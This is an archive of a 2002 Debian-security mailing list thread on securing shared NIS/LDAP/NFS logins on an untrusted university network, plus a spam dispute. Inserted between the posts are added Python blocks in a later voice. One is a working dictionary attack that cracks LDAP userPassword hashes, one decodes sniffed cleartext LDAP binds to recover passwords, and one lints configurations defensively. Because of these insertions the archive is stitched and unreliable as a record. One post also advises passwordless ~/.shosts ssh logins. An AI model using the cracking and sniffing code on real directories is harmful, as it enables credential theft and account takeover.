subscribe

2002-04-07 Thread fh ML


--
  Florian Hinzmann private: [EMAIL PROTECTED]
Debian: [EMAIL PROTECTED]
PGP Key / ID: 1024D/B4071A65
Fingerprint : F9AB 00C1 3E3A 8125 DD3F  DF1C DF79 A374 B407 1A65


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]




Re: NFS, password transparency, and security

2002-04-07 Thread Tarjei Huse

Hi,

Just thought I'd chip in some support for LDAP. Also a kerberos
pointer:
www.bayour.com has a very good ldap+kerberos howto for debian written by
Turbo Fredrikson.

Also you should check out directory administrator for administering your
directory. A simple ldap client for administering ldap users.

Now, the last thing: Does anyone have a URL for the SFS fileserver
system?

Tarjei






Re: NFS, password transparency, and security

2002-04-07 Thread tony mancill
On Sun, 7 Apr 2002, Luca Filipozzi wrote:

> I suspect that if all your boxes are running Debian that your life will
> be made easier by all the Debian kerberos packages.

This is an interesting thread, and this comment just gave me an idea.
What if you use FreeS/WAN (or really, any sort of IPsec)?  It can be set
up in a mode that's called "opportunistic encryption" that will use IPsec
for communication when it's available and allow other traffic to proceed
as normal.  In this way, you won't care if things like LDAP (or even NIS)
pass passwords around in cleartext, just as long as the workstation <->
file-server or authentication server connections are encrypted.  Although
I haven't done it, you should be able to run the server services bound to
a specific IP that is only accessible via clients that have successfully
IPsec-attached.

0.02,
tony

  [EMAIL PROTECTED] |  An ounce of perception,
http://www.debian.org  | a pound of obscure...
   |(Peart)





Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi

On Mon, Apr 08, 2002 at 08:23:17AM +0300, Sami Haahtinen wrote:
> On Sun, Apr 07, 2002 at 08:14:26PM -0700, Luca Filipozzi wrote:
> > Two choices (I like lists :) ):
> > 
> > (1) use libpam-ldap:
> 
> i recommend this.

I also recommend this.

> > (2) don't use libpam-ldap:
> > You don't have to use libpam-ldap.  You could just use
> > libnss-ldap and have the ldap server transfer the password
> > hashes to the workstations in the clear ... which is equivalent
> > to NIS.  You could also use libnss-ldap with SSL/TLS so that the
> > hashes are transferred more securely (equivalent to NIS+).
> 
> i don't recommend the above to anyone (do as i say, not as i do.. =) it
> will cause problems, you are forced to enter the database access
> password to the configuration, which you will then need to make readable
> to root, which in turn forces you to use nscd.

No, you don't.  You can set the ACLs in slapd.conf for userPassword to
'by * read'.  Sure, it's not a good choice.  That's why I said that it
is the equivalent of NIS.

> this also allows crackers to access your userbase, unlike libpam-ldap,
> where you are not forced to allow userpassword read access to the
> database. The cracker just needs to hack this machine, read the password
> from config and voila, ur nt3w0rk has been 0wn3d!

You don't need to put a binddn/bindpw into libnss-ldap if you make
userPassword readable by all.  libnss-ldap can bind anonymously.  It's
NIS-equivalent, however, so if the hashes are weak based on weak
passwords, a dictionary attack is possible (just like NIS).

Also, if you were to use a binddn/bindpw, you wouldn't use the
rootdn/rootpw.

Note for non-LDAP folk: userPassword is the hashed password, not the
cleartext password.

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D



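Added example, not code from anyone on this list: with the 'by * read' ACL
Luca mentions, an anonymous libnss-ldap client (or anyone else who can reach
tcp/389) gets the whole set of userPassword hashes, and the NIS-style
dictionary attack he describes is then an offline loop. The LDIF entries,
salt and wordlist below are constructed for the example; only the {SSHA} and
{SHA} schemes and scheme-less cleartext values are handled, and the LDIF
reader is the minimum needed for ldapsearch-style output (base64 '::' lines
included).

```python
"""Offline dictionary attack against userPassword values exposed by a slapd
'by * read' ACL.  Added example; the LDIF and wordlist below are constructed,
not data from the list's systems."""
import base64
import hashlib


def ssha(password, salt):
    """OpenLDAP {SSHA}: base64(sha1(password || salt) || salt)."""
    digest = hashlib.sha1(password.encode() + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode()


def sha(password):
    """OpenLDAP {SHA}: unsalted sha1, so equal passwords share one hash."""
    return "{SHA}" + base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


def parse_ldif(text):
    """Minimal LDIF reader: blank-line separated entries, 'attr: v' and base64 'attr:: v'."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode()
        else:
            value = value.strip()
        current.setdefault(attr.strip(), []).append(value)
    if current:
        entries.append(current)
    return entries


def verify(stored, candidate):
    """Check a candidate against a stored userPassword value the way slapd would."""
    if stored.startswith("{SSHA}"):
        raw = base64.b64decode(stored[len("{SSHA}"):])
        digest, salt = raw[:20], raw[20:]
        return hashlib.sha1(candidate.encode() + salt).digest() == digest
    if stored.startswith("{SHA}"):
        return base64.b64decode(stored[len("{SHA}"):]) == hashlib.sha1(candidate.encode()).digest()
    if stored.startswith("{"):
        return False                 # scheme not handled here ({CRYPT}, {MD5}, ...)
    return stored == candidate       # no scheme prefix: slapd compares cleartext


def dictionary_attack(ldif_text, wordlist):
    """Return {uid: password} for every entry whose stored value matches a word."""
    cracked = {}
    for entry in parse_ldif(ldif_text):
        uid = entry.get("uid", ["?"])[0]
        for stored in entry.get("userPassword", []):
            hit = next((w for w in wordlist if verify(stored, w)), None)
            if hit is not None:
                cracked[uid] = hit
    return cracked


# Constructed sample of what an anonymous 'ldapsearch -x userPassword' returns
# under 'by * read'; ldapsearch prints the attribute base64-encoded ('::').
_SALT = b"\x9c\x13\x7a\x01"
SAMPLE_LDIF = "\n".join([
    "dn: uid=rob,ou=people,dc=example,dc=edu",
    "uid: rob",
    "userPassword:: " + base64.b64encode(ssha("hunter2", _SALT).encode()).decode(),
    "",
    "dn: uid=alice,ou=people,dc=example,dc=edu",
    "uid: alice",
    "userPassword:: " + base64.b64encode(sha("password").encode()).decode(),
    "",
    "dn: uid=bob,ou=people,dc=example,dc=edu",
    "uid: bob",
    "userPassword:: " + base64.b64encode(ssha("vR7!qm2#Lz9xWu", _SALT).encode()).decode(),
    "",
    "dn: uid=carol,ou=people,dc=example,dc=edu",
    "uid: carol",
    "userPassword: letmein",     # stored without a scheme: cleartext in the directory
])

# Constructed wordlist; a real attack uses a far larger one.
WORDLIST = ["123456", "password", "astronomy", "hunter2", "letmein"]

if __name__ == "__main__":
    for uid, pw in dictionary_attack(SAMPLE_LDIF, WORDLIST).items():
        print(f"{uid}: {pw}")
```

bob's strong password survives the wordlist; the other three fall, which is
the whole difference between an ACL that gives anonymous 'auth' on
userPassword (enough for a libpam-ldap bind) and one that gives 'read'.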



Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi
On Sun, Apr 07, 2002 at 10:04:01PM -0500, Rob VanFleet wrote:
> On Sun, Apr 07, 2002 at 07:39:43PM -0700, Luca Filipozzi wrote:
> > Two choices for authentication (passwd + shadow):
> > (1) Kerberos
> > Never used it. Can't advise you.
> 
> I've looked at Kerberos, but at least a cursory glance leaves the
> impression that it is ridiculously complicated to set up and requires
> multiple servers.  If someone has used it and can correct me, please do.

I suspect that if all your boxes are running Debian that your life will
be made easier by all the Debian kerberos packages.

> > (2) LDAP
> > Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> > the equivalent of NIS but securely.
> 
> Without using SSL or Kerberos, would LDAP still be sending passwords
> across the net in plain text?

Two choices (I like lists :) ):

(1) use libpam-ldap:
libpam-ldap sends the password to the ldap server.  If not using
TLS/SSL, then it is sent in the clear.  By sending the password to
the server (rather than using a salt+hash), you can use whatever
hash algorithm you want on the server.  The server takes the
password and does the hashing locally.
So, you *must* use TLS/SSL if you are using libpam-ldap, imo.

(2) don't use libpam-ldap:
You don't have to use libpam-ldap.  You could just use
libnss-ldap and have the ldap server transfer the password
hashes to the workstations in the clear ... which is equivalent
to NIS.  You could also use libnss-ldap with SSL/TLS so that the
hashes are transferred more securely (equivalent to NIS+).

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D



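Added example, not code from anyone on this list: the bind libpam-ldap issues
is an LDAPv3 BindRequest with a simple credential, so anyone on the shared
subnet who captures the tcp/389 segment gets the DN and the password with a
few lines of BER decoding. The packet bytes, the DN
uid=rob,ou=people,dc=example,dc=edu and the password are constructed here
with the encoder in the block; after StartTLS the same bind is only visible
as a TLS record, which classify_payload() treats as opaque.

```python
"""Decode what a passive listener on the shared subnet sees when libpam-ldap
performs a simple bind without TLS.  Added example; the packet bytes below are
constructed with the encoder, not captured from anyone's network."""

# BER tags used by LDAPv3 (RFC 4511) for the LDAPMessage / BindRequest framing.
TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0], constructed
TAG_AUTH_SIMPLE = 0x80    # [0] primitive: the password itself, as an OCTET STRING
TAG_AUTH_SASL = 0xA3      # [3] constructed: SaslCredentials


def encode_tlv(tag, value):
    """BER-encode one tag/length/value triple (definite-length form only)."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + value


def decode_tlv(buf, pos=0):
    """Return (tag, value, next_pos) for the BER element starting at buf[pos]."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits count the length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def build_simple_bind(message_id, dn, password):
    """The LDAPMessage a client such as libpam-ldap sends for a simple bind."""
    bind = (encode_tlv(TAG_INTEGER, b"\x03")                   # version 3
            + encode_tlv(TAG_OCTET_STRING, dn.encode())       # name (LDAPDN)
            + encode_tlv(TAG_AUTH_SIMPLE, password.encode()))  # authentication: simple
    return encode_tlv(TAG_SEQUENCE,
                      encode_tlv(TAG_INTEGER, bytes([message_id]))
                      + encode_tlv(TAG_BIND_REQUEST, bind))


def parse_bind_request(packet):
    """DN and credential from a cleartext BindRequest, or None if it is not one."""
    tag, msg, _ = decode_tlv(packet)
    if tag != TAG_SEQUENCE:
        return None
    tag, mid, pos = decode_tlv(msg)
    if tag != TAG_INTEGER:
        return None
    tag, op, _ = decode_tlv(msg, pos)
    if tag != TAG_BIND_REQUEST:
        return None
    _, version, pos = decode_tlv(op)
    _, name, pos = decode_tlv(op, pos)
    auth_tag, cred, _ = decode_tlv(op, pos)
    info = {"message_id": int.from_bytes(mid, "big"),
            "version": int.from_bytes(version, "big"),
            "dn": name.decode()}
    if auth_tag == TAG_AUTH_SIMPLE:
        info["auth"] = "simple"
        info["password"] = cred.decode()    # exactly what the sniffer gets
    elif auth_tag == TAG_AUTH_SASL:
        info["auth"] = "sasl"
    return info


def classify_payload(payload):
    """What a monitor on tcp/389 can say about the first bytes of a segment."""
    if payload[:1] in (b"\x16", b"\x17"):   # TLS handshake / application-data record
        return "tls"
    try:
        info = parse_bind_request(payload)
    except (IndexError, UnicodeDecodeError):  # truncated or non-LDAP bytes
        info = None
    if info and info.get("auth") == "simple":
        return "cleartext-simple-bind"
    return "other"


# Constructed sample: the bind libpam-ldap would issue when rob logs in.
SAMPLE_BIND = build_simple_bind(1, "uid=rob,ou=people,dc=example,dc=edu", "hunter2")
# Constructed sample: after StartTLS the same bind is only an opaque TLS record.
SAMPLE_TLS_RECORD = b"\x17\x03\x01\x00\x20" + bytes(32)

if __name__ == "__main__":
    print(parse_bind_request(SAMPLE_BIND))
    print(classify_payload(SAMPLE_BIND), classify_payload(SAMPLE_TLS_RECORD))
```

Note that with StartTLS on port 389 the first ExtendedRequest is still plain
LDAP; only the bind that follows it is inside TLS, so a rule that flags any
cleartext simple bind on 389 catches exactly the misconfiguration and nothing
else.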


Re: NFS, password transparency, and security

2002-04-07 Thread Sami Haahtinen

On Sun, Apr 07, 2002 at 08:14:26PM -0700, Luca Filipozzi wrote:
> Two choices (I like lists :) ):
> 
> (1) use libpam-ldap:

i recommend this. Even though the current pam system is a pain to
modify.. if you modify one file and it gets updated in the package it
will nag about it.. you can't tell if it's a needed change or not,
luckily i have heard rumours about new design for the pam system and i'm
eagerly waiting for it to arrive =)

> (2) don't use libpam-ldap:
> You don't have to use libpam-ldap.  You could just use
> libnss-ldap and have the ldap server transfer the password
> hashes to the workstations in the clear ... which is equivalent
> to NIS.  You could also use libnss-ldap with SSL/TLS so that the
> hashes are transferred more securely (equivalent to NIS+).

i don't recommend the above to anyone (do as i say, not as i do.. =) it
will cause problems, you are forced to enter the database access
password to the configuration, which you will then need to make readable
to root, which in turn forces you to use nscd.

There is nothing wrong with nscd, it's just plain stupid.. if you have a
small database, there is no problem, but if you have a big database (max
cached entries +1) you might start running in to trouble. apparently the
caching mechanism is quite stupid and it can't just expire an entry
because someone needs a new one.. =(

this also allows crackers to access your userbase, unlike libpam-ldap,
where you are not forced to allow userpassword read access to the
database. The cracker just needs to hack this machine, read the password
from config and voila, ur nt3w0rk has been 0wn3d!


Sami

-- 
  -< Sami Haahtinen >-
  -[ Is it still a bug, if we have learned to live with it? ]-
-< 2209 3C53 D0FB 041C F7B1  F908 A9B6 F730 B83D 761C >-



msg06261/pgp0.pgp
Description: PGP signature


Re: NFS, password transparency, and security

2002-04-07 Thread Rob VanFleet
On Sun, Apr 07, 2002 at 07:39:43PM -0700, Luca Filipozzi wrote:
> Two choices for authentication (passwd + shadow):
> (1) Kerberos
> Never used it. Can't advise you.

I've looked at Kerberos, but at least a cursory glance leaves the
impression that it is ridiculously complicated to set up and requires
multiple servers.  If someone has used it and can correct me, please do.

> (2) LDAP
> Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> the equivalent of NIS but securely.

Without using SSL or Kerberos, would LDAP still be sending passwords
across the net in plain text?

[...]
> Several choices for file sharing:
> (1) NFS + iptables + tcpwrappers

Doing that right now.

> (2) SFS (see sfs-server sfs-client packages and www.fs.net)
> Requires users to authenticate against the file server, also.
> Consider using libpam-sfs (I'm rewriting it as we speak.)
> (3) OpenAFS (see openafs-fileserver + openafs-client)
> Also requires users to authenticate against the file server, but
> when used in a Kerberos environment, you only have to logon once due
> to Kerberos' ticket-granting system.

Both of these sound very promising.  I had heard of AFS before, but not
SFS.  I'll have to research them further.  I'll probably have even more
questions after that though. :)

> Hope this (probably incomplete) list helps,

Immensely.  Thanks for the information.

Rob





Re: NFS, password transparency, and security

2002-04-07 Thread Alvin Oga

hi ya

why not do the following ???

make one machine be your primary NIS server...
- all passwds defined there...

all other machines uses the NIS server for passwd authentication
and turn on ssh logins ( ~/.shosts )  w/o checking passwd

use automounter for /n//directories
http://www.Linux-Consulting.com/AutoFS/autofs-HOWTO.html

add additional security as needed
- turn on tcp_wrappers
- use secure nfs/portmapper

- do NOT allow insecure operations in a secure environment
( no wireless stuff, no dhcp stuff, no pop3, no telnet, no ftp )

and magically it's just like sun-environment... sorta ...

c ya
alvin
http://www.Linux-Sec.net 

On Sun, 7 Apr 2002, Luca Filipozzi wrote:

> On Sun, Apr 07, 2002 at 09:02:56PM -0500, Rob VanFleet wrote:
> > I work for several University astronomers who basically want something
> > like what they're used to at other places: a pure sun shop, running
> > NIS and NFS.
> 
> Two choices for authentication (passwd + shadow):
> (1) Kerberos
> Never used it. Can't advise you.
> (2) LDAP
> Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> the equivalent of NIS but securely.
> 
> Several choices for authorisation (pam_access.so):
> (1) local /etc/security/access.conf listing all users
> (2) local /etc/security/access.conf listing a group or netgroup
> - use local group file
> - use LDAP-distributed group or netgroup map
> 
> Several choices for file sharing:
> (1) NFS + iptables + tcpwrappers
> (2) SFS (see sfs-server sfs-client packages and www.fs.net)
> Requires users to authenticate against the file server, also.
> Consider using libpam-sfs (I'm rewriting it as we speak.)
> (3) OpenAFS (see openafs-fileserver + openafs-client)
> Also requires users to authenticate against the file server, but
> when used in a Kerberos environment, you only have to logon once due
> to Kerberos' ticket-granting system.
> 
> Hope this (probably incomplete) list helps,
> 
> Luca
> 
> -- 
> Luca Filipozzi, Debian Developer
> [dpkg] We are the apt. You will be packaged. Comply.
> gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D
> 
> 
> 





Re: NFS, password transparency, and security

2002-04-07 Thread Alan Shutko
Rob VanFleet <[EMAIL PROTECTED]> writes:

> They basically want to log into any one machine within this group
> with the same password, and be able to access any disks they choose
> from any particular machine (within this group).

An AFS-based setup is used at many places to great effect, especially
on untrusted nets, but I don't know how bad setup is.  I suspect it's
evil.

-- 
Alan Shutko <[EMAIL PROTECTED]> - In a variety of flavors!
Ban the bomb.  Save the world for conventional warfare.





Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi

On Sun, Apr 07, 2002 at 09:22:12PM -0700, tony mancill wrote:
> What if you use FreeS/WAN (or really, any sort of IPsec)?  It can be set
> up in a mode that's called "opportunistic encryption" that will use IPsec
> for communication when it's available and allow other traffic to proceed
> as normal.  In this way, you won't care if things like LDAP (or even NIS)
> pass passwords around in cleartext, just as long as the workstation <->
> file-server or authentication server connections are encrypted.  Although
> I haven't done it, you should be able to run the server services bound to
> a specific IP that is only accessible via clients that have successfully
> IPsec-attached.

For the NFS traffic, opportunistic encryption seems like a very
interesting idea.

There's no way I would use libpam-ldap without knowing *for certain*
that it was going over a TLS/SSL connection, however.

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D



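Added example, not code from anyone on this list, of the check behind
"knowing for certain" that the libpam-ldap bind is protected, together with
the slapd ACL point from the libnss-ldap exchange earlier in the thread. It
lints a constructed client file in the pam_ldap.conf / libnss-ldap.conf style
(the keys uri, host, ssl, tls_checkpeer, binddn and bindpw, and the values
'ssl start_tls' and 'tls_checkpeer yes', are assumed from PADL's ldap.conf
of the time) and a constructed slapd.conf ACL on userPassword. The access
levels follow slapd's none < disclose < auth < compare < search < read <
write < manage; the '=' privilege form is not parsed.

```python
"""Lint a libpam-ldap/libnss-ldap client file and a slapd.conf ACL for the
weaknesses argued over in this thread.  Added example with constructed configs;
the client key names are assumed from PADL's ldap.conf (see the lead-in)."""

# slapd access levels, weakest to strongest.  'read' or above on userPassword
# hands the hashes to whoever the 'by' clause names.
ACCESS_LEVELS = ["none", "disclose", "auth", "compare", "search", "read", "write", "manage"]
WORLD = ("*", "anonymous", "users")


def parse_kv_config(text):
    """'key value' lines with '#' comments; a later key overrides an earlier one."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            conf[key.lower()] = value.strip().strip('"')
    return conf


def lint_client_config(text, directory_rootdn=None):
    """Findings for the client side (what libpam-ldap / libnss-ldap read)."""
    conf, findings = parse_kv_config(text), []
    if conf.get("ssl", "no").lower() not in ("on", "start_tls") \
            and not conf.get("uri", "").startswith("ldaps://"):
        findings.append("CLEARTEXT_BIND")        # simple bind carries the password in the clear
    if conf.get("tls_checkpeer", "").lower() != "yes":
        findings.append("NO_PEER_VERIFICATION")  # TLS to whoever answers; a MITM goes unnoticed
    if "bindpw" in conf:
        findings.append("BINDPW_ON_DISK")        # a directory credential readable by local root
        if directory_rootdn and conf.get("binddn", "").lower() == directory_rootdn.lower():
            findings.append("BINDDN_IS_ROOTDN")  # one owned workstation then owns the directory
    return findings


def slapd_directives(text):
    """Join slapd.conf continuation lines (leading whitespace) into logical lines."""
    lines = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and lines:
            lines[-1] += " " + raw.strip()
        else:
            lines.append(raw.strip())
    return lines


def lint_userpassword_acl(text):
    """Findings for the first 'access to' directive covering userPassword
    (slapd evaluates directives in order and stops at the first match)."""
    for directive in slapd_directives(text):
        if not directive.startswith("access to "):
            continue
        target, *clauses = directive[len("access to "):].split(" by ")
        if target.strip() != "*" and "userpassword" not in target.lower():
            continue
        for clause in clauses:
            who, level, *_ = clause.split() + ["*", "none"]   # pad a malformed clause harmlessly
            if who in WORLD and level in ACCESS_LEVELS \
                    and ACCESS_LEVELS.index(level) >= ACCESS_LEVELS.index("read"):
                return ["USERPASSWORD_WORLD_READABLE"]
        return []
    return ["USERPASSWORD_ACL_MISSING"]   # slapd's built-in default is 'access to * by * read'


# Constructed configurations: the NIS-equivalent setup and a hardened one.
WEAK_CLIENT = """host ldap.example.edu
base dc=example,dc=edu
ssl no
binddn cn=admin,dc=example,dc=edu
bindpw s3cret
"""
HARDENED_CLIENT = """uri ldap://ldap.example.edu/
base dc=example,dc=edu
ssl start_tls
tls_checkpeer yes
tls_cacertfile /etc/ssl/certs/campus-ca.pem
"""
WEAK_SLAPD = """rootdn "cn=admin,dc=example,dc=edu"
access to attrs=userPassword
        by self write
        by * read
"""
HARDENED_SLAPD = """rootdn "cn=admin,dc=example,dc=edu"
access to attrs=userPassword
        by self write
        by anonymous auth
        by * none
access to *
        by * read
"""

if __name__ == "__main__":
    rootdn = parse_kv_config(WEAK_SLAPD).get("rootdn")
    print("weak:", lint_client_config(WEAK_CLIENT, rootdn), lint_userpassword_acl(WEAK_SLAPD))
    print("hardened:", lint_client_config(HARDENED_CLIENT, rootdn), lint_userpassword_acl(HARDENED_SLAPD))
```

The hardened pair is clean because anonymous gets only 'auth' on
userPassword, which is all a libpam-ldap simple bind needs, while the
libnss-ldap lookups never see a hash; no bindpw is stored on the workstation
at all.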



Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi
On Sun, Apr 07, 2002 at 09:02:56PM -0500, Rob VanFleet wrote:
> I work for several University astronomers who basically want something
> like what they're used to at other places: a pure sun shop, running
> NIS and NFS.

Two choices for authentication (passwd + shadow):
(1) Kerberos
Never used it. Can't advise you.
(2) LDAP
Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
the equivalent of NIS but securely.

Several choices for authorisation (pam_access.so):
(1) local /etc/security/access.conf listing all users
(2) local /etc/security/access.conf listing a group or netgroup
- use local group file
- use LDAP-distributed group or netgroup map

Several choices for file sharing:
(1) NFS + iptables + tcpwrappers
(2) SFS (see sfs-server sfs-client packages and www.fs.net)
Requires users to authenticate against the file server, also.
Consider using libpam-sfs (I'm rewriting it as we speak.)
(3) OpenAFS (see openafs-fileserver + openafs-client)
Also requires users to authenticate against the file server, but
when used in a Kerberos environment, you only have to logon once due
to Kerberos' ticket-granting system.

Hope this (probably incomplete) list helps,

Luca

-- 
Luca Filipozzi, Debian Developer
[dpkg] We are the apt. You will be packaged. Comply.
gpgkey 5A827A2D - A149 97BD 188C 7F29 779E  09C1 3573 32C4 5A82 7A2D





NFS, password transparency, and security

2002-04-07 Thread Rob VanFleet
I have a situation where my superiors are leaning heavily on me to make
life more convenient for them by having total availability of data from
a group of machines.  They basically want to log into any one machine
within this group with the same password, and be able to access any
disks they choose from any particular machine (within this group).

What makes me nervous is that I have little to no control over
the network.  The particular setup at our university is that every
single ethernet drop has a unique and world accessible IP (most of this
is done with DHCP, so most change, but the machines that have purposes,
like the aforementioned group - don't).  These machines also share
subnets with machines I don't control, which makes using non-encrypted
authentication even more dangerous than usual - it is a switched
network, but that doesn't protect against much at all.  The best I can
do to keep these machines from being affected from the world is to have
iptables firewalls set up on each of them, basically denying everything
including pings from outside specified subnets.  This is a less than
desirable solution, not to mention the scalability issues inherent with
every single machine having its own set of firewall rules.

What I am curious to know is the best way possible to implement
what they want and to do so as securely as possible.  I work for several
University astronomers who basically want something like what they're
used to at other places: a pure sun shop, running NIS and NFS.  While
I'm aware that this can be done just as easily with Linux, I am going to
assume that many places who run NIS/NFS do so inside a strictly internal
network, not on several Machines that have external IPs to themselves on
subnets shared by student lab machines and other untrusted nodes.

What I have done so far is just have a few users' home directories
mounted over NFS on a central machine, making sure that they have the
same UIDs across the board.  I am rapidly realizing that this solution
does not scale well, plus it does not provide a full solution.

I apologize in advance for any rambling or over-generalizations.  Please
add any advice or corrections you may have.


Thanks,
Rob






Re: NEOMAIL - as big kev in OZ would say, IM EXCITED !

2002-04-07 Thread Marcel Welschbillig

Hi,

Just wanted to make it clear that the email i sent about Neomail was 
purely to let other people know about a program that i thought was worth 
mentioning, it had nothing to do with Ernie Miller and was not intended 
to be SPAM.


I'm sorry if i have caused you problems Ernie this is the last thing i 
wanted to do.


In future i will keep my discoveries to myself !

Marcel

Ernie Miller wrote:


Andrew,

The NeoMail project's only member is me.  I have nothing to do with this
guy, and though I'm happy he's happy with NeoMail, this is clearly
inappropriate behavior.  I'm copying this mail to the perpetrator address as
listed in your forward, so he understands that I don't encourage this type
of behavior, but I don't have any affiliation with him.  I'd have been
plenty happy if NeoMail hadn't become as popular as it is, and would
certainly not be advertising, as I can't really handle the NeoMail-related
e-mail I receive now as it is.

When you say "further damage," you imply my reputation is already
damaged in the open-source community as-is, which I don't believe it to
be -- unless someone were to mistake these mails as being originated by or
condoned by me, and you are referring to this incident.   Hence my response
to the list, hopefully clearing my name since you've opted to submit the
accusation to the list as well.

Wait a second... upon rereading this mail I did in fact notice a mail in
my inbox this morning from someone in Australia ranting about how much he
liked NeoMail and that he had wasted money on a commercial solution prior to
finding it.  The mail is at home, but I'd wager this is the same guy.  In
any case, I'm sorry that he got a bit overexcited, and I hope everyone
understands I had nothing to do with it.

If you need anything further from me feel free to reply to this address.

Thanks!

Ernie Miller


- Original Message -
From: "Andrew Lau" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: "Debian-Security List" 
Sent: Friday, April 05, 2002 7:55 AM
Subject: Re: NEOMAIL - as big kev in OZ would say, IM EXCITED !

Dear Ernie Miller,
 I'm forwarding you this piece of spam that was recently sent
to the debian-security mailing list. It is also archived at
. Being
unable to find a Marcel Welschbillig listed on your SourceForge
project page, I have decided against forwarding this to SourceForge
abuse staff at the present time seeing as I am unable to determine
whether this spam was authorised or not by you or anyone acting on
behalf of the NeoMail project. However, this piece of spam has been
previously listed on the Razor  website
as spam which would lead me to believe that this is not a one-off
incident. Please take action to stop further spam if you do know this
person or else unsolicited advertising promoting your project will
only further damage your reputation among the opensource community.

Yours sincerely,
Andrew "Netsnipe" Lau

- Forwarded message from Marcel Welschbillig
<[EMAIL PROTECTED]> -

Received: from localhost ([127.0.0.1] ident=netsnipe)
 by espresso with esmtp (Exim 3.35 #1 (Debian))
 id 16tNxs-0001v9-00
 for <[EMAIL PROTECTED]>; Fri, 05 Apr 2002 17:16:52 +1000
Received: from pop3.iprimus.com.au [203.134.64.85]
 by localhost with IMAP (fetchmail-5.9.11)
 for [EMAIL PROTECTED] (single-drop); Fri, 05 Apr 2002 17:16:52 +1000 (EST)
Received: from mx01.iprimus.com.au ([203.134.64.90]) by loc01.iprimus.com.au
with Microsoft SMTPSVC(5.5.1877.647.64);
  Fri, 5 Apr 2002 11:58:04 +1000
Received: from murphy.debian.org ([65.125.64.134]) by mx01.iprimus.com.au
with Microsoft SMTPSVC(5.0.2195.4617);
  Fri, 5 Apr 2002 11:58:03 +1000
Received: (qmail 15663 invoked by uid 38); 5 Apr 2002 01:56:55 -
X-Envelope-Sender: [EMAIL PROTECTED]
Received: (qmail 15618 invoked from network); 5 Apr 2002 01:56:52 -
Received: from unknown (HELO vager2.comdek.net.au) ([EMAIL PROTECTED])
  by murphy.debian.org with SMTP; 5 Apr 2002 01:56:52 -
Received: from comdek.net.au ([EMAIL PROTECTED] [127.0.0.1])
 by vager2.comdek.net.au (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id
JAA03755
 for ; Fri, 5 Apr 2002 09:42:12 +0800
X-Authentication-Warning: vager2.comdek.net.au: Host [EMAIL PROTECTED]
[127.0.0.1] claimed to be comdek.net.au
Message-ID: <[EMAIL PROTECTED]>
Date: Fri, 05 Apr 2002 09:42:11 +0800
From: Marcel Welschbillig <[EMAIL PROTECTED]>
User-Agent: Mozilla/5.0 (X11; U; Linux 2.4.4 i686; en-US; m18)
Gecko/20001107 Netscape6/6.0
X-Accept-Language: en
MIME-Version: 1.0
To: Debian-Security List 
Subject: NEOMAIL - as big kev in OZ would say, IM EXCITED !
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Resent-Message-ID: <[EMAIL PROTECTED]>
Resent-From: debian-security@lists.debian.org
X-Mailing-List:  archive/latest/6720
X-Loop: debian-security@lists.debian.org
List-Post: 

Re: NFS, password transparency, and security

2002-04-07 Thread Luca Filipozzi

On Sun, Apr 07, 2002 at 10:04:01PM -0500, Rob VanFleet wrote:
> On Sun, Apr 07, 2002 at 07:39:43PM -0700, Luca Filipozzi wrote:
> > Two choices for authentication (passwd + shadow):
> > (1) Kerberos
> > Never used it. Can't advise you.
> 
> I've looked at Kerberos, but at least a cursory glance at leaves the
> impressions that it is ridiculously complicated to set up and requires
> multiple servers.  If someone has used it and can correct me, please do.

I suspect that if all your boxes are running Debian that your life will
be made easier by all the Debian kerberos packages.

> > (2) LDAP
> > Use LDAP (recompile --with-tls flag) + libpam-ldap + libnss-ldap to do
> > the equivalent of NIS but securely.
> 
> Without using SSL or Kerberos, would LDAP still be sending passwords
> across the net in plain text?

Two choices (I like lists :) ):

(1) use libpam-ldap:
libpam-ldap sends the password to the ldap server.  If not using
TLS/SSL, then it is sent in the clear.  By sending the password to
the server (rather than using a salt+hash), you can use whatever
hash algorithm you want on the server.  The server takes the
password and does the hashing locally.
So, you *must* use TLS/SSL if you are using libpam-ldap, imo.

